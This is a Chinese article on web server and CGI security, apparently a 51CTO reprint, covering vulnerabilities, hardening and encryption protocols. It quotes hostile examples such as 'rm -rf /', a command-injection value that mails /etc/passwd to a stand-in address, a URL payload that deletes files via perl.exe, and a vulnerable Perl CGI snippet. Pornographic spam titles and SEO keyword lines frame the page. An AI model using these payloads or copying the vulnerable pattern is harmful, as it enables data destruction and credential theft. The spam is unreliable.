成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Web安全技術與防火墻

安全 應用安全
計算機的安全性歷來都是人們討論的主要話題之一。而計算機安全主要研究的是計算機病毒的防治和系統的安全。在計算機網絡日益擴展和普及的今天,計算機安全的要求更高,涉及面更廣。

1、概述

計算機的安全性歷來都是人們討論的主要話題之一。而計算機安全主要研究的是計算機病毒的防治和系統的安全。在計算機網絡日益擴展和普及的今天,計算機安全的要求更高,涉及面更廣。不但要求防治病毒,還要提高系統抵抗外來非法黑客入侵的能力,還要提高對遠程數據傳輸的保密性,避免在傳輸途中遭受非法竊取。

在防治網絡病毒方面,在http傳輸中HTML文件是一般不會存在感染病毒的危險。危險在于下載可執行軟件如:.zip .exe .arj .Z 等文件過程中應特別加以注意。都有潛伏病毒的可能性。

對于系統本身安全性,主要考慮服務器自身穩定性、健狀性,增強自身抵抗能力,杜絕一切可能讓黑客入侵的渠道,避免造成對系統的威脅。對重要商業應用,必須加上防火墻和數據加密技術加以保護。

在數據加密方面,更重要的是不斷提高和改進數據加密技術,使不法分子難有可乘之機。

當然,計算機系統安全是個很大的范疇,本章僅僅討論在構造 web時,可能出現的一些情況,希望能引起重視。

2、WEB在安全上的漏洞WEB 服務器上的漏洞可以從以下幾方面考慮:

(1)在web服務器上你不讓人訪問的秘密文件、目錄或重要數據。

(2)從遠程用戶向服務器發送信息時,特別是信用卡之類東西時,中途遭不法分子非法攔截。

(3) web服務器本身存在的一些漏洞,使得一些人能侵入到主機系統破壞一些重要的數據,甚至造成系統癱瘓。

(4)CGI安全方面的漏洞有:

1〕有意或無意在主機系統中遺漏(bugs)給非法黑客創造條件。

2〕用 CGI腳本編寫的程序當涉及到遠程用戶從瀏覽器中輸入表格(form) 并進行象檢索(Search index)或form-mail之類在主機上直接操作命令時,或許會給web主機系統造成危險。

因此,從CGI角度考慮WEB的安全性,主要是在編制程序時,應詳細考慮到安全因素。盡量避免CGI程序中存在漏洞。

從web服務器版本上分析:

在1995年3月發現NCSA1.3以下版本的HTTPD明顯存在安全上的漏洞,即客戶計算機可以任意地執行服務器上面的命令,非常危險。但,NCSA1.4以上版本的服務器就補上了這個漏洞。還有一些簡單的從網上下載WEB服務器,沒有過多考慮到一些安全因素,不能用作商業應用。

因此,不管是配置服務器,還是在編寫 CGI程序時都要注意系統的安全性。盡量堵住任何存在的漏洞,創造安全的環境。在具體服務器設置及編寫 cgi程序時應該注意:

管理服務器上

1)禁止亂用從其他網中下載的一些工具軟件,并在沒有詳細了解之前盡量不要用root身份注冊執行。以防止某些程序員在程序中設下的陷井,如:程序中加上一兩行 "rm -rf /"或"mail username < /etc/passwd" 之類情況發生。

2)在選用 web服務器時,應考慮到不同服務器對安全的要求不一樣。一些簡單的 web服務器就沒有考慮到一些安全的因素,不能把他用作商業應用。只作一些個人的網點。

3)在利用WEB中的.htpass來管理和校驗用戶口令時,存在校驗的口令和用戶名不受次數限制。

3、如何在WEB上提高系統安全性和穩定性

web服務器安全預防措施:

〔1〕限制在web服務器開帳戶,定期刪除一些斷進程的用戶。

〔2〕對在web服務器上開的帳戶,在口令長度及定期更改方面作出要求,防止被盜用。

〔3〕盡量使ftp, mail等服務器與之分開,去掉ftp,sendmail,tftp,NIS, NFS,finger,netstat等一些無關的應用。

〔4〕在web服務器上去掉一些絕對不用的shell等之類解釋器,即當在你的 cgi的程序中沒用到perl時,就盡量把perl在系統解釋器中刪除掉。

〔5〕定期查看服務器中的日志logs文件,分析一切可疑事件。在errorlog 中出現rm, login, /bin/perl, /bin/sh 等之類記錄時,你的服務器可能有受到一些非法用戶的入侵的嘗試。

〔6〕設置好web服務器上系統文件的權限和屬性,對可讓人訪問的文檔分配一個公用的組如:www,并只分配它只讀的權利。把所有的HTML文件歸屬WWW組,由WEB管理員管理WWW組。對于WEB的配置文件僅對WEB管理員有寫的權利。

〔7〕有些WEB服務器把WEB的文檔目錄與FTP目錄指在同一目錄時,應該注意不要把FTP的目錄與CGI-BIN指定在一個目錄之下。這樣是為了防止一些用戶通過 FTP上在一些尤如PERL或SH之類程序并用WEB的CGI-BIN去執行造成不良后果。

〔8〕通過限制許可訪問用戶IP或DNS如:

在NCSA中的access.conf中加上:

< Directory /full/path/to/directory >

< Limit GET POST >

order mutual-failure

deny from all

allow from 168.160.142. abc.net.cn

< /Limit >

< /Directory >

#p#

這樣只能是以域名為abc.net.cn或IP屬于168.160.142的客戶訪問該WEB服務器。對于CERN或W3C服務器可以這樣在httpd.conf中加上:

Protection LOCAL-USERS {

GetMask @(*.capricorn.com, *.zoo.org, 18.157.0.5)

}

Protect /relative/path/to/directory/* LOCAL-USERS

〔9〕WINDOWS下HTTPD

1)Netscape Communications Server for NT

〖1〗Perl解釋器的漏洞

Netscape Communications Server中無法識別cgi-bin下的擴展名及其應用關系,如:.pl是PERL的代碼程序自動調用 perl.exe文件解釋,即使現在也只能把perl.exe文件存放在cgi-bin目錄之下。執行如:

/cgi-bin/perl.exe?&my_script.pl. 但是這就給任何人都有執行 perl的可能,當有些人在其瀏覽器的URL中加上如:/cgi-bin/perl.exe?&-e+unlink+%3C*%3E 時,有可能造成刪除服務器當前目錄下文件的危險。但是,其他如:O''Reilly WebSite或Purveyor都不存在這種漏洞。

〖2〗CGI執行批處理文件的漏洞

文件名:test.bat:

@echo off

echo Content-type: text/plain

echo

echo Hello World!

如果客戶瀏覽器的URL為:/cgi-bin/test.bat?&dir則執行調用命令解釋器完成dir列表。這給訪問者有執行其他命令可能性。

2)O''Reilly WebSite server for Windows NT/95

在WebSite1.1B以前的版本中使用配處理文件存在著Netscape同樣的漏洞,但是,新版關閉.bat在cgi中的作用。支持 perl,VB和C作為CGI開發工具。至于他的安全問題參看:http://website.ora.com/devcomer/secalert1

3)Microsoft''s IIS Web Server

在96年3月5日前的IIS在NT下的.bat CGI的 bug甚至比其他更嚴重,可以任意使用command命令。但之后修補該漏洞。你可檢查你的可執行文件的建立日期。IIS3.0還存在一些安全bug,主要是cgi-bin下的覆給權利。

另外,許多 WEB服務器本身都存在一些安全上的漏洞,都是在版本升級過程不斷更新。在這就不一一列舉。

從CGI編程角度考慮安全:

〔1〕采用編譯語言比解釋語言會更安全些,并且 CGI程序應放在獨立于HTML 存放目錄之外的CGI-BIN下,是為了防止一些非法訪問者從瀏覽器端取得解釋性語言的原代碼后從中尋找漏洞。

〔2〕在用C來編寫CGI程序時盡量少用popen(), system()和所有涉及/bin/sh 的shell命令。在Perl中system(), exec(), open(),eval()等exec或eval之類命令。在由用戶填寫的form還回cgi時,不要直接調用system()之類函數。這是為避免當填寫內容為“rm -rf /*”或“/usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org< /etc/passwd”之類內容。

〔3〕用Perl編寫CGI時如:

$mail_to = &get_name_from_input;

open (MAIL,"| /usr/lib/sendmail $mail_to");

print MAIL "To: $mailtonFrom: mennHi there!n";

close MAIL;

該小程序是把客戶瀏覽器的form到服務器的mail處理程序。

另外,對于數據的加密與傳輸,目前有SSL,SHTTP,SHEN等協議供大家研究。

〔1〕SSL(Secure Socket Layer)系由Netscape公司建議的一種建構在TCP協議之上的保密措施通訊協議,不但適用于HTTP,而且還適用于 TELNET,FTP,NNTP, GOPHER等客戶/服務器模式的安全協議。Netscape Navigator, Secure Mosaic, 和Microsoft Internet Explorer等客戶瀏覽器與Netscape, Microsoft, IBM, Quarterdeck, OpenMarket 和 O''Reilly等服務器產品都采用SSL協議。

詳細請參看:http://home.netscape.com/newsref/std/SSL.html

〔2〕SHTTP(Secure HTTP)系由CommerceNet公司建議構造在HTTP協議之上的高層協議。目前由Open Market公司推銷的 Open Marketplace 服務器結合Enterprise Integration Technologies的Secure HTTP Mosaic客戶瀏覽器采用S-HTTP。

詳細參看:http://www.eit.com/creations/s-http/

4、防火墻(Firewall)

當一個網絡接上Internet之后,系統的安全除了考慮計算機病毒、系統的健壯性之外,更主要的是防止非法用戶的入侵。而目前防止的措施主要是靠防火墻的技術完成。防火墻(firewall)是指一個由軟件或和硬件設備組合而成,處于企業或網絡群體計算機與外界通道(Internet)之間,限制外界用戶對內部網絡訪問及管理內部用戶訪問外界網絡的權限。
 

【編輯推薦】

  1. 專家解讀:Web安全原理與技術分析
  2. 沒有絕對的安全Web安全需澄清的五個誤
  3. 社交網絡時代來臨 企業需要Web安全
責任編輯:趙寧寧 來源: 中國IT實驗室
相關推薦

2011-03-25 11:18:51

2010-07-20 20:45:54

2010-07-12 14:15:56

2010-09-17 15:25:31

2011-03-25 11:06:46

2010-10-25 12:07:51

2010-05-24 17:49:56

2010-12-08 09:29:27

下一代防火墻

2011-03-15 10:32:05

2022-09-20 16:38:08

數據安全數據泄露安全

2011-03-25 10:50:26

2011-03-09 11:23:26

2013-07-04 10:16:24

2010-07-07 20:06:53

2010-07-12 11:33:52

2021-06-25 18:35:30

Web應用防火墻

2011-05-10 09:17:01

2011-02-17 18:30:25

2011-02-15 18:38:49

2012-04-26 18:59:43

防火墻WEB應用防火墻沙龍
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 一级毛片视频在线 | 午夜影院普通用户体验区 | 国产精品色 | 国产在线精品一区 | 91不卡| 日韩成人av在线 | 国外成人在线视频网站 | 老牛嫩草一区二区三区av | 羞羞色视频| 99久久99热这里只有精品 | 国内精品视频在线 | 中文字幕 视频一区 | 中文字幕一区二区三区乱码在线 | 久热免费 | 国产精品一区二区免费 | 91精品国产色综合久久 | 东京久久 | 久久狠狠| av毛片在线免费观看 | 日韩成人精品一区二区三区 | 精品一区二区三区视频在线观看 | 2018天天干天天操 | 国产精品久久久久久久久久久免费看 | 国产一级视频在线播放 | 久草在线青青草 | 亚洲一区在线免费观看 | 久久久av| www久久久 | 国产成人精品一区二区三区 | 在线观看视频一区 | 91av国产在线视频 | 欧美午夜精品 | 看a网站 | 欧美国产日韩精品 | 极品粉嫩国产48尤物在线播放 | 奇米影视在线 | 日韩电影中文字幕在线观看 | 精品国产一区二区三区性色 | 国产精品黄视频 | 色吊丝在线 | 手机看黄av免费网址 |